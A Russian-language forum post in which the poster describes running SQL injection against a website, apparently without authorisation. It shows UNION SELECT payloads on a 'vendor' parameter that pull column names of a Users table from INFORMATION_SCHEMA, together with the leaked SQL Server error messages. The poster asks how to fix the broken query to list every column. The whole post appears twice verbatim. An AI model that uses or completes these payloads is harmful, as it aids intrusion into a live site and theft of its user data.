Всем доброго времени суток.
В общем с помощью SQL инъекции на сайте узнал все имена таблиц. Далее запрос:
&vendor=19 UNION SELECT COLUMN_NAME,null FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=Users
Выдал
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value UserName to a column of data type int.
Т.е. Первый столбец называется UserName.
Далее делаю такой запрос:
&vendor=19 UNION SELECT COLUMN_NAME,null FROM INFORMATION_SCHEMA.COLUMNS WHERE%20TABLE_NAME=Users WHERE%20COLUMN_NAME NOT IN (UserName)
На это сервер выдает:
[Microsoft][ODBC SQL Server Driver][SQL Server]Incorrect syntax near the keyword WHERE.
Из-за этого неудается получить названия остальных столбцов. По этому у меня вопрос как правильно сформировать запрос, чтобы сервер выдал названия всех столбцов.
Заранее благодарен.
В общем с помощью SQL инъекции на сайте узнал все имена таблиц. Далее запрос:
&vendor=19 UNION SELECT COLUMN_NAME,null FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=Users
Выдал
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value UserName to a column of data type int.
Т.е. Первый столбец называется UserName.
Далее делаю такой запрос:
&vendor=19 UNION SELECT COLUMN_NAME,null FROM INFORMATION_SCHEMA.COLUMNS WHERE%20TABLE_NAME=Users WHERE%20COLUMN_NAME NOT IN (UserName)
На это сервер выдает:
[Microsoft][ODBC SQL Server Driver][SQL Server]Incorrect syntax near the keyword WHERE.
Из-за этого неудается получить названия остальных столбцов. По этому у меня вопрос как правильно сформировать запрос, чтобы сервер выдал названия всех столбцов.
Заранее благодарен.